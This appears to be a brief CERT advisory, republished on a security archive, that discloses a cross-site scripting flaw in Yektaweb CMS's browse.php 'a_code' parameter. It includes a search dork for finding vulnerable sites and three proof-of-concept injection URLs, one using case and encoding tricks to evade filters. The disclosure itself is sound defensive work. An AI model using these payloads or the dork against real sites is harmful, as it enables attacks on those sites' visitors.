Yektaweb CMS suffers from a cross site scripting vulnerability.
4c52f3fb3a8ad5ab5e504bf25d55286e9607ff57b3a92665a332d0b7dc4c03df================= IUT-CERT =================
Title: YEKTAWEB CMS XSS Vulnerability
Vendor: www.yektaweb.com
Dork: Powered by Academic Web Tools ( AWT ) - Yektaweb Collection
Type: Input.Validation.Vulnerability (cross-Site scripting)
Fix: N/A
================== nsec.ir =================
Description:
--------------------------------------------
YEKTAWEB is an Academic web tool. "browse.php" pages in this CMS is vulnerable
to xss and link injection.
Vulnerability Variant:
---------------------------------------------
XSS: "browse.php" in "a_code" parameter.
http://www.example.com/browse.php?a_code="></IFRAME><script>alert(12345)</script>&sid=1&slc_lang=fa
http://www.example.com/browse.php?a_code=1<iframe/+/onload=alert(12345)></iframe>.
http://www.example.com/browse.php?a_code=1>"><ScRiPt %0A%0D>alert(12345)%3B</ScRiPt>.
Solution:
---------------------------------------------
Input validation of Parameter "a_code" should be corrected.
Credit:
---------------------------------------------
Isfahan University of Technology - Computer Emergency Response Team
Thanks to : N. Fathi, M. R. Faghani
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed